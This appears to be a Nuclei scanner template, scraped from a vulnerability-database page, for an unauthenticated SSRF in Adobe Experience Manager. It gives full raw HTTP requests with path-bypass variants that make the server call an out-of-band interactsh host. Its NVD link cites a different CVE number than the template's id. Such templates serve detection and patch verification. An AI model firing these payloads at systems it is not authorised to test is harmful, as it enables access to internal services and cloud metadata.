id: CVE-2025-54249
info:
name: Adobe Experience Manager ≤ 6.5.23.0 – SSRF
author: DhiyaneshDk,assetnote
severity: medium
description: |
Adobe Experience Manager versions 6.5.23.0 and earlier are affected by a Server-Side Request Forgery (SSRF) vulnerability that could result in a Security feature bypass
impact: |
Unauthenticated attackers can bypass security feature restrictions and force the server to make requests to arbitrary URLs, potentially enabling access to internal services and metadata endpoints.
remediation: |
Upgrade Adobe Experience Manager to a version later than 6.5.23.0 that properly validates redirect URLs and implements SSRF protections.
reference:
- https://github.com/assetnote/hopgoblin/blob/main/hopgoblin.py
- https://nvd.nist.gov/vuln/detail/CVE-2025-54251
- https://helpx.adobe.com/security/products/experience-manager/apsb25-90.html
metadata:
verified: true
max-request: 6
vendor: adobe
product: experience_manager
fofa-query: body="/libs/granite/core/content/login.html"
tags: cve,cve2025,adobe,aem,ssrf,oast,oob,vkev,vuln
http:
- raw:
- |
POST /services/accesstoken/verify;x='.pdf/x' HTTP/1.1
Host: {{Hostname}}
User-Agent: hopgoblin/1.0
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: keep-alive
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="139", "Not=A?Brand";v="8", "Chromium";v="139"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US;q=0.9,en;q=0.8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Content-Type: application/x-www-form-urlencoded
auth_url=https%3A%2F%2F{{interactsh-url}}
payloads:
path:
- "/services/accesstoken/verify;x='.pdf/x'"
- "/services/accesstoken/verify;x='.ico/x'"
- "/services/accesstoken/verify;x='.html/x'"
- "/services/accesstoken/verify;x='.css/x'"
- "/services/accesstoken/verify;x='x/graphql/execute/json/x'"
- "/graphql/execute.json/..%2F../services/accesstoken/verify"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_any(body,'<html')"
condition: and
- type: word
part: interactsh_protocol
words:
- "http"
extractors:
- type: dsl
dsl:
- 'interactsh_protocol'
- 'interactsh_request'
# digest: 4b0a00483046022100f75646a98daab993617823879973039b68b1423affcc2b5c216ba487ee933bd30221008777ac00011c7b08e69648b41990221d1195771e54f979ba3654ccd53f078be0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation